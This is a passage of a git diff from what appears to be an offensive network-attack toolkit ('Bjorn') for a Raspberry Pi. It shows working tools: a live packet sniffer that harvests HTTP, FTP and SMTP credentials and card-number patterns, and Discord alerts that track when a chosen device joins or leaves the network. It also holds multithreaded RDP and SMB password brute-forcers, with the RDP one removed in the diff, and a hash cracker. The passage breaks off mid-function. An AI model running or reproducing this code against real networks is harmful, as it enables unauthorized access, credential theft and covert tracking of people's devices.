elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
except Exception as e:
logger.debug(f"Packet processing error: {e}")
def _analyze_http(self, packet):
if hasattr(packet.http, 'request_uri'):
uri = packet.http.request_uri
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
m = re.findall(pattern, uri, re.I)
if m:
self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_ftp(self, packet):
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
field = 'username' if cmd == 'USER' else 'password'
self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
def _analyze_smtp(self, packet):
if hasattr(packet.smtp, 'command_line'):
line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
m = re.findall(pattern, line, re.I)
if m:
self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
}
for name, pattern in patterns.items():
m = re.findall(pattern, payload)
if m:
self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
def _add_cred(self, proto, field, value, source):
with self.lock:
cred = {
'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
try:
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
start_time = time.time()
packet_count = 0
# Use sniff_continuously for real-time processing
for packet in self.capture.sniff_continuously():
if self.shared_data.orchestrator_should_exit:
break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e:
logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally:
if self.capture:
try: self.capture.close()
except: pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
return "success"
if __name__ == "__main__":
from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")

84
actions/presence_join.py Normal file
View File

@@ -0,0 +1,84 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")

84
actions/presence_left.py Normal file
View File

@@ -0,0 +1,84 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")

View File

@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

209
actions/rune_cracker.py Normal file
View File

@@ -0,0 +1,209 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hashes: Set[str] = set()
self.cracked: Dict[str, Dict[str, Any]] = {}
self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Performance tuning for Pi Zero 2
self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
def _hash_password(self, password: str, h_type: str) -> Optional[str]:
"""Generate hash for a password using specified algorithm."""
try:
if h_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif h_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif h_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif h_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None
def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Worker function for cracking passwords."""
if self.shared_data.orchestrator_should_exit:
return
for h_type in HASH_PATTERNS.keys():
if self.hash_type and self.hash_type != h_type:
continue
hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
with self.lock:
if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try:
with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
for line in f:
hv = line.strip()
if not hv: continue
# Auto-detect or validate
for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
break
except Exception as e:
logger.error(f"Error loading hashes: {e}")
return "failed"
if not self.hashes:
logger.warning("No valid hashes found in input file.")
return "failed"
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False)
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e:
logger.error(f"Cracking engine error: {e}")
return "failed"
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")

File diff suppressed because it is too large Load Diff

381
actions/smb_bruteforce.py Normal file
View File

@@ -0,0 +1,381 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Wrapper orchestrateur -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Lance le bruteforce SMB pour (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
